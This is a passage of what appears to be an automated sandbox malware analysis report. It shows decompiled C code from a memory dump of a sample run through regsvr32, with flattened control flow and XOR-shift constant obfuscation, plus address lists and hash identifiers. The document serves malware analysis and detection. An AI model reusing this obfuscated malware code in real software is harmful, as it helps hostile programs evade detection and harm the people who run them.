				_v40 = _v40 ^ 0x80d1dff2;
				_v40 = _v40 ^ 0x4a259152;
				_v28 = 0x6eaddd;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x2530fcd0;
				_v28 = _v28 ^ 0x25385ebf;
				_v16 = 0xea9281;
				_v16 = _v16 + 0xffffa671;
				_v16 = _v16 ^ 0x00e46cff;
				_v32 = 0x2e7d6d;
				_v32 = _v32 * 6;
				_v32 = _v32 + 0xe407;
				_v32 = _v32 ^ 0x0112753d;
				_v56 = 0x9d81e1;
				_v56 = _v56 * 0x1b;
				_v56 = _v56 | 0xafd50898;
				_v56 = _v56 * 0x1a;
				_v56 = _v56 ^ 0x7c8ea9af;
				_v12 = 0x871404;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x2e68c54b;
				while(1) {
					_t133 =  *_t132;
					if(_t133 == 0) {
						break;
					}
					if( *((intOrPtr*)(_t133 + 0x14)) == 0) {
						L4:
						 *_t132 =  *((intOrPtr*)(_t133 + 0x3c));
						_t113 = E001B17D2(_v56, _v12, _t133);
					} else {
						_t113 = E001A79CC( *((intOrPtr*)(_t133 + 4)), _v20, _t117, _v24, _v48, _v52);
						_t135 =  &(_t135[4]);
						if(_t113 != _v44) {
							_t104 = _t133 + 0x3c; // 0x2b51e999
							_t132 = _t104;
						} else {
							 *((intOrPtr*)(_t133 + 0xc))( *((intOrPtr*)(_t133 + 0x14)), 0, 0);
							E001C1BE6(_v48,  *((intOrPtr*)(_t133 + 0x14)), _v52);
							E001B02D8( *((intOrPtr*)(_t133 + 4)), _v40, _v28, _v44);
							_t135 =  &(_t135[3]);
							goto L4;
						}
					}
				}
				return _t113;
			}
























                                                                                                                0x001b6e97
                                                                                                                0x001b6e9a
                                                                                                                0x001b6ea8
                                                                                                                0x001b6eb0
                                                                                                                0x001b6eb4
                                                                                                                0x001b6eb6
                                                                                                                0x001b6ebe
                                                                                                                0x001b6ec1
                                                                                                                0x001b6ecf
                                                                                                                0x001b6ed2
                                                                                                                0x001b6ed6
                                                                                                                0x001b6ede
                                                                                                                0x001b6ee6
                                                                                                                0x001b6eeb
                                                                                                                0x001b6ef3
                                                                                                                0x001b6efb
                                                                                                                0x001b6f00
                                                                                                                0x001b6f08
                                                                                                                0x001b6f10
                                                                                                                0x001b6f18
                                                                                                                0x001b6f1d
                                                                                                                0x001b6f25
                                                                                                                0x001b6f2d
                                                                                                                0x001b6f32
                                                                                                                0x001b6f37
                                                                                                                0x001b6f3f
                                                                                                                0x001b6f47
                                                                                                                0x001b6f54
                                                                                                                0x001b6f58
                                                                                                                0x001b6f60
                                                                                                                0x001b6f68
                                                                                                                0x001b6f70
                                                                                                                0x001b6f78
                                                                                                                0x001b6f80
                                                                                                                0x001b6f88
                                                                                                                0x001b6f8d
                                                                                                                0x001b6f95
                                                                                                                0x001b6f9d
                                                                                                                0x001b6fa5
                                                                                                                0x001b6fad
                                                                                                                0x001b6fb5
                                                                                                                0x001b6fc2
                                                                                                                0x001b6fc6
                                                                                                                0x001b6fce
                                                                                                                0x001b6fd6
                                                                                                                0x001b6fe3
                                                                                                                0x001b6fe7
                                                                                                                0x001b6ff4
                                                                                                                0x001b6ff8
                                                                                                                0x001b7000
                                                                                                                0x001b700d
                                                                                                                0x001b7011
                                                                                                                0x001b7085
                                                                                                                0x001b7085
                                                                                                                0x001b7089
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b701e
                                                                                                                0x001b7071
                                                                                                                0x001b707d
                                                                                                                0x001b707f
                                                                                                                0x001b7020
                                                                                                                0x001b7034
                                                                                                                0x001b7039
                                                                                                                0x001b7040
                                                                                                                0x001b7093
                                                                                                                0x001b7093
                                                                                                                0x001b7042
                                                                                                                0x001b7047
                                                                                                                0x001b7055
                                                                                                                0x001b7069
                                                                                                                0x001b706e
                                                                                                                0x00000000
                                                                                                                0x001b706e
                                                                                                                0x001b7040
                                                                                                                0x001b701e
                                                                                                                0x001b7092

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Ez$m}.
                                                                                                                • API String ID: 0-3270494409
                                                                                                                • Opcode ID: cad2a70dc0f0926579b0b4c27cf0ae496e8c25688f035e9ced31f10c32d6d060
                                                                                                                • Instruction ID: 093893d2574b734563d255bcde43a24826f488bc55b12a17b100fe7e968fa5e4
                                                                                                                • Opcode Fuzzy Hash: cad2a70dc0f0926579b0b4c27cf0ae496e8c25688f035e9ced31f10c32d6d060
                                                                                                                • Instruction Fuzzy Hash: 4851EE710093419FC798DF25D58980BBBF1FBD9758F809A1DF496A6260C3B0EA098F96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BFAD1 Relevance: 2.6, Strings: 2, Instructions: 111COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E001BFAD1() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				void* _t87;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int* _t106;

				_t106 =  &_v352;
				_v328 = 0x680e43;
				_t104 = 0;
				_t87 = 0x45a3892;
				_v324 = 0;
				_v340 = 0x7ab44a;
				_v340 = _v340 + 0xffff1f85;
				_t100 = 0x4c;
				_v340 = _v340 / _t100;
				_v340 = _v340 ^ 0x0002e2d7;
				_v352 = 0x29d857;
				_t101 = 0x23;
				_v352 = _v352 * 0x3e;
				_v352 = _v352 >> 0xe;
				_v352 = _v352 >> 0x10;
				_v352 = _v352 ^ 0x000fb3ba;
				_v332 = 0x23539f;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x0049ed7a;
				_v336 = 0xdc95a7;
				_v336 = _v336 << 4;
				_v336 = _v336 ^ 0x0dce7c82;
				_v344 = 0x96fb4d;
				_v344 = _v344 ^ 0x46ce857e;
				_v344 = _v344 / _t101;
				_v344 = _v344 ^ 0x020b2d03;
				_v348 = 0x1333ff;
				_v348 = _v348 + 0x8c2e;
				_v348 = _v348 + 0xffffe08c;
				_t102 = 0x57;
				_v348 = _v348 / _t102;
				_v348 = _v348 ^ 0x000c9b9c;
				do {
					while(_t87 != 0x4f0453) {
						if(_t87 == 0x201b8ca) {
							_t87 = 0x4f0453;
							_t104 = _t104 + _v280 * 0x3e8;
							continue;
						} else {
							if(_t87 == 0x410ff33) {
								_v284 = 0x11c;
								E001AC0BA(_v340, _v352,  &_v284);
								_t87 = 0xc335a88;
								continue;
							} else {
								if(_t87 == 0x45a3892) {
									_t87 = 0x410ff33;
									continue;
								} else {
									if(_t87 == 0x4cd0df1) {
										_t87 = 0x201b8ca;
										_t104 = _t104 + (_v2 & 0x000000ff) * 0x186a0;
										continue;
									} else {
										if(_t87 == 0x956385b) {
											_t104 = _t104 + (_v320 & 0x0000ffff);
										} else {
											if(_t87 != 0xc335a88) {
												goto L14;
											} else {
												E001AD3BF(_v332, _v336, _v344,  &_v320, _v348);
												_t106 =  &(_t106[3]);
												_t87 = 0x4cd0df1;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t104;
					}
					_t87 = 0x956385b;
					_t104 = _t104 + _v276 * 0x64;
					L14:
				} while (_t87 != 0x9fe4a63);
				goto L17;
			}






















                                                                                                                0x001bfad1
                                                                                                                0x001bfad7
                                                                                                                0x001bfae5
                                                                                                                0x001bfae7
                                                                                                                0x001bfaec
                                                                                                                0x001bfaf5
                                                                                                                0x001bfb02
                                                                                                                0x001bfb10
                                                                                                                0x001bfb15
                                                                                                                0x001bfb1b
                                                                                                                0x001bfb23
                                                                                                                0x001bfb30
                                                                                                                0x001bfb33
                                                                                                                0x001bfb37
                                                                                                                0x001bfb3c
                                                                                                                0x001bfb41
                                                                                                                0x001bfb49
                                                                                                                0x001bfb51
                                                                                                                0x001bfb55
                                                                                                                0x001bfb5d
                                                                                                                0x001bfb65
                                                                                                                0x001bfb6a
                                                                                                                0x001bfb72
                                                                                                                0x001bfb7a
                                                                                                                0x001bfb8a
                                                                                                                0x001bfb8e
                                                                                                                0x001bfb96
                                                                                                                0x001bfb9e
                                                                                                                0x001bfba6
                                                                                                                0x001bfbb2
                                                                                                                0x001bfbba
                                                                                                                0x001bfbbe
                                                                                                                0x001bfbc6
                                                                                                                0x001bfbc6
                                                                                                                0x001bfbd4
                                                                                                                0x001bfc6a
                                                                                                                0x001bfc6c
                                                                                                                0x00000000
                                                                                                                0x001bfbda
                                                                                                                0x001bfbdc
                                                                                                                0x001bfc4a
                                                                                                                0x001bfc52
                                                                                                                0x001bfc58
                                                                                                                0x00000000
                                                                                                                0x001bfbde
                                                                                                                0x001bfbe4
                                                                                                                0x001bfc39
                                                                                                                0x00000000
                                                                                                                0x001bfbe6
                                                                                                                0x001bfbec
                                                                                                                0x001bfc2a
                                                                                                                0x001bfc35
                                                                                                                0x00000000
                                                                                                                0x001bfbee
                                                                                                                0x001bfbf0
                                                                                                                0x001bfc8f
                                                                                                                0x001bfbf6
                                                                                                                0x001bfbfc
                                                                                                                0x00000000
                                                                                                                0x001bfbfe
                                                                                                                0x001bfc13
                                                                                                                0x001bfc18
                                                                                                                0x001bfc1b
                                                                                                                0x00000000
                                                                                                                0x001bfc1b
                                                                                                                0x001bfbfc
                                                                                                                0x001bfbf0
                                                                                                                0x001bfbec
                                                                                                                0x001bfbe4
                                                                                                                0x001bfbdc
                                                                                                                0x001bfc92
                                                                                                                0x001bfc9d
                                                                                                                0x001bfc9d
                                                                                                                0x001bfc78
                                                                                                                0x001bfc7a
                                                                                                                0x001bfc7c
                                                                                                                0x001bfc7c
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [8V$zI
                                                                                                                • API String ID: 0-7124573
                                                                                                                • Opcode ID: 7ee5508a42d793d338c3a3453ab651a2523bc2996baf11e9e386dead470e74bc
                                                                                                                • Instruction ID: 2f9762e10521fecd716c7ab76e0fc6d1418c650463df94868bfb1ef23886ffc9
                                                                                                                • Opcode Fuzzy Hash: 7ee5508a42d793d338c3a3453ab651a2523bc2996baf11e9e386dead470e74bc
                                                                                                                • Instruction Fuzzy Hash: A141CF715083068FD318CF25D99496FBBE2FBC4718F10892EF98697250D3B4DA4A8B83
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B3094 Relevance: 2.6, Strings: 2, Instructions: 103COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B3094(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t107;
				signed int _t111;
				signed int _t112;
				signed int _t113;

				_v56 = 0x1a0f6;
				_v48 = 0;
				_v52 = 0;
				_v20 = 0xf0813e;
				_v20 = _v20 << 9;
				_t111 = 0x7f;
				_v20 = _v20 * 0x35;
				_v20 = _v20 ^ 0x9587c5d6;
				_v12 = 0x2ff68;
				_v12 = _v12 + 0x3637;
				_v12 = _v12 + 0xffffc8fe;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x00003ff4;
				_v16 = 0xe7eb51;
				_v16 = _v16 * 0x35;
				_v16 = _v16 << 0xf;
				_v16 = _v16 ^ 0x75fd2a3c;
				_v16 = _v16 ^ 0xae1a8b0c;
				_v36 = 0x639668;
				_v36 = _v36 | 0xacdefd33;
				_v36 = _v36 ^ 0xacf85737;
				_v8 = 0x632eec;
				_v8 = _v8 << 8;
				_t112 = 0x4c;
				_v8 = _v8 / _t111;
				_v8 = _v8 + 0xaae6;
				_v8 = _v8 ^ 0x00c079da;
				_v28 = 0xa6b509;
				_v28 = _v28 / _t112;
				_v28 = _v28 + 0xfcd;
				_v28 = _v28 ^ 0x00071c8b;
				_v24 = 0x2ed0d;
				_v24 = _v24 << 3;
				_v24 = _v24 * 0x4d;
				_v24 = _v24 ^ 0x0705ed46;
				_v40 = 0x280fc8;
				_v40 = _v40 + 0xffff47a2;
				_v40 = _v40 ^ 0x002e9d56;
				_v44 = 0xbfc35a;
				_v44 = _v44 + 0xffff329d;
				_v44 = _v44 ^ 0x00b8ce5f;
				_v32 = 0x17d77d;
				_v32 = _v32 ^ 0x4bb6603c;
				_v32 = _v32 ^ 0x4ba57b24;
				_t113 = _v20;
				if(E001B3C24(_t113,  &_v576, _v12, _v16) != 0) {
					_t107 =  &_v576;
					if(_v576 != 0) {
						while( *_t107 != 0x5c) {
							_t107 = _t107 + 2;
							if( *_t107 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t113 = 0;
						 *((short*)(_t107 + 2)) = 0;
					}
					L6:
					_push(_t113);
					E001B660B(_v36, _v8,  &_v48,  &_v576, _v28, _t113, _t113, _v24, _v40, _t113, _t113, _v44, _v32);
				}
				return _v48;
			}





















                                                                                                                0x001b309d
                                                                                                                0x001b30a9
                                                                                                                0x001b30ac
                                                                                                                0x001b30af
                                                                                                                0x001b30b6
                                                                                                                0x001b30c0
                                                                                                                0x001b30c3
                                                                                                                0x001b30c6
                                                                                                                0x001b30cd
                                                                                                                0x001b30d4
                                                                                                                0x001b30db
                                                                                                                0x001b30e2
                                                                                                                0x001b30e6
                                                                                                                0x001b30ed
                                                                                                                0x001b30f8
                                                                                                                0x001b30fb
                                                                                                                0x001b30ff
                                                                                                                0x001b3106
                                                                                                                0x001b310d
                                                                                                                0x001b3114
                                                                                                                0x001b311b
                                                                                                                0x001b3122
                                                                                                                0x001b3129
                                                                                                                0x001b3132
                                                                                                                0x001b3133
                                                                                                                0x001b3138
                                                                                                                0x001b313f
                                                                                                                0x001b3146
                                                                                                                0x001b3152
                                                                                                                0x001b3155
                                                                                                                0x001b315c
                                                                                                                0x001b3163
                                                                                                                0x001b316a
                                                                                                                0x001b3172
                                                                                                                0x001b317b
                                                                                                                0x001b3182
                                                                                                                0x001b3189
                                                                                                                0x001b3190
                                                                                                                0x001b3197
                                                                                                                0x001b319e
                                                                                                                0x001b31a5
                                                                                                                0x001b31ac
                                                                                                                0x001b31b3
                                                                                                                0x001b31ba
                                                                                                                0x001b31c7
                                                                                                                0x001b31d5
                                                                                                                0x001b31d7
                                                                                                                0x001b31e4
                                                                                                                0x001b31e6
                                                                                                                0x001b31ec
                                                                                                                0x001b31f2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b31f4
                                                                                                                0x00000000
                                                                                                                0x001b31f2
                                                                                                                0x001b31f6
                                                                                                                0x001b31f8
                                                                                                                0x001b31f8
                                                                                                                0x001b31fc
                                                                                                                0x001b31fc
                                                                                                                0x001b3221
                                                                                                                0x001b3226
                                                                                                                0x001b3230

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Q$.c
                                                                                                                • API String ID: 0-2625308445
                                                                                                                • Opcode ID: 0b7d7f54afde24db4bd51453a3d3c7343f1ebadcef81c582e73d1cfa7f7e7fd7
                                                                                                                • Instruction ID: 69f1d0a3fa542b774d9138d38f601916b6bdd829b25bd98cb4917696e420cb10
                                                                                                                • Opcode Fuzzy Hash: 0b7d7f54afde24db4bd51453a3d3c7343f1ebadcef81c582e73d1cfa7f7e7fd7
                                                                                                                • Instruction Fuzzy Hash: 4B41F1B1C0121DEBDF14CFA4C98A8EEBBB5FB04304F208199D121B6260E3B95B54DFA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BF7F4 Relevance: 2.6, Strings: 2, Instructions: 91COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E001BF7F4(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				intOrPtr _t115;

				_v12 = 0xcca755;
				_v12 = _v12 ^ 0x1e26665c;
				_v12 = _v12 | 0x17f7bcc9;
				_v12 = _v12 ^ 0x1ff1351a;
				_v36 = 0x622835;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x141f023e;
				_v40 = 0xdf80cb;
				_t100 = 0xb;
				_v40 = _v40 / _t100;
				_v40 = _v40 ^ 0x001bc7be;
				_v20 = 0x9d4900;
				_t101 = 0x31;
				_v20 = _v20 / _t101;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x000516ac;
				_v16 = 0x22bcd0;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0x9b9668fc;
				_v16 = _v16 ^ 0xdeea632e;
				_v32 = 0x6d2532;
				_v32 = _v32 >> 0xb;
				_v32 = _v32 + 0xffff364a;
				_v32 = _v32 ^ 0xfffd51d5;
				_v28 = 0x501981;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0xffff5696;
				_v28 = _v28 ^ 0xfff98fb8;
				_v24 = 0xe38074;
				_v24 = _v24 + 0xffff46dd;
				_t102 = 0x35;
				_t115 = _a4;
				_v24 = _v24 * 0x5d;
				_v24 = _v24 ^ 0x526bbbf2;
				_v8 = 0x551580;
				_v8 = _v8 / _t102;
				_v8 = _v8 << 4;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000bcc63;
				_t94 =  *((intOrPtr*)(_t115 + 0xc))( *((intOrPtr*)(_t115 + 0x14)), 1, 0);
				_t122 = _t94;
				if(_t94 != 0) {
					_push(_v36);
					_t96 = E001AE4F5(_v12, 0x1a11d8, _t122);
					_push(_v16);
					_t117 = _t96;
					_push( *((intOrPtr*)(_t115 + 0x14)));
					_push(_t96);
					_t97 = E001A9343(_v40, _v20);
					if(_t97 != 0) {
						 *_t97();
					}
					E001BF94B(_t117, _v32, _v28, _v24, _v8);
				}
				return 0;
			}



















                                                                                                                0x001bf7fa
                                                                                                                0x001bf803
                                                                                                                0x001bf80a
                                                                                                                0x001bf811
                                                                                                                0x001bf818
                                                                                                                0x001bf81f
                                                                                                                0x001bf823
                                                                                                                0x001bf82a
                                                                                                                0x001bf837
                                                                                                                0x001bf83c
                                                                                                                0x001bf841
                                                                                                                0x001bf848
                                                                                                                0x001bf852
                                                                                                                0x001bf857
                                                                                                                0x001bf85c
                                                                                                                0x001bf85f
                                                                                                                0x001bf866
                                                                                                                0x001bf86d
                                                                                                                0x001bf871
                                                                                                                0x001bf878
                                                                                                                0x001bf87f
                                                                                                                0x001bf886
                                                                                                                0x001bf88a
                                                                                                                0x001bf891
                                                                                                                0x001bf898
                                                                                                                0x001bf89f
                                                                                                                0x001bf8a3
                                                                                                                0x001bf8aa
                                                                                                                0x001bf8b1
                                                                                                                0x001bf8b8
                                                                                                                0x001bf8c3
                                                                                                                0x001bf8c4
                                                                                                                0x001bf8cb
                                                                                                                0x001bf8ce
                                                                                                                0x001bf8d5
                                                                                                                0x001bf8e1
                                                                                                                0x001bf8e4
                                                                                                                0x001bf8e8
                                                                                                                0x001bf8ec
                                                                                                                0x001bf8f6
                                                                                                                0x001bf8f9
                                                                                                                0x001bf8fb
                                                                                                                0x001bf8fe
                                                                                                                0x001bf909
                                                                                                                0x001bf90e
                                                                                                                0x001bf914
                                                                                                                0x001bf916
                                                                                                                0x001bf91c
                                                                                                                0x001bf91d
                                                                                                                0x001bf927
                                                                                                                0x001bf929
                                                                                                                0x001bf929
                                                                                                                0x001bf939
                                                                                                                0x001bf941
                                                                                                                0x001bf948

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 2%m$5(b
                                                                                                                • API String ID: 0-1732443568
                                                                                                                • Opcode ID: 2236f85df998c9117053d2c1eac68e4196a1c09e67b72bf3059920d1a50e59e1
                                                                                                                • Instruction ID: 3e2899e1ac0c4c14c189a5b723c3bd207470f54e9654149a0e7f57b6643c7411
                                                                                                                • Opcode Fuzzy Hash: 2236f85df998c9117053d2c1eac68e4196a1c09e67b72bf3059920d1a50e59e1
                                                                                                                • Instruction Fuzzy Hash: 20414471D0020AEBCF08CFA1D94A5EEBBB1FF54704F208059E911B6290D7B25B56CF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001B9A4 Relevance: 1.9, APIs: 1, Instructions: 445COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E1001B9A4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1003D1E6(E1005301F, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E1001B373(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E10019C16(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E1001884C(_t225 - 0x14, _t222, 7);
								_t194 = 0x1006f148 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E10017EC7();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E1001887B(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E10017EC7();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E1001887B(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M1001BEBC))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E10024520(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E10019C16(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E10023F76(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E10018895(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E10019C3D(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E1002DAC9(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E1001A3E3(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E10023F76(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E100245A8(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E10019C16(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
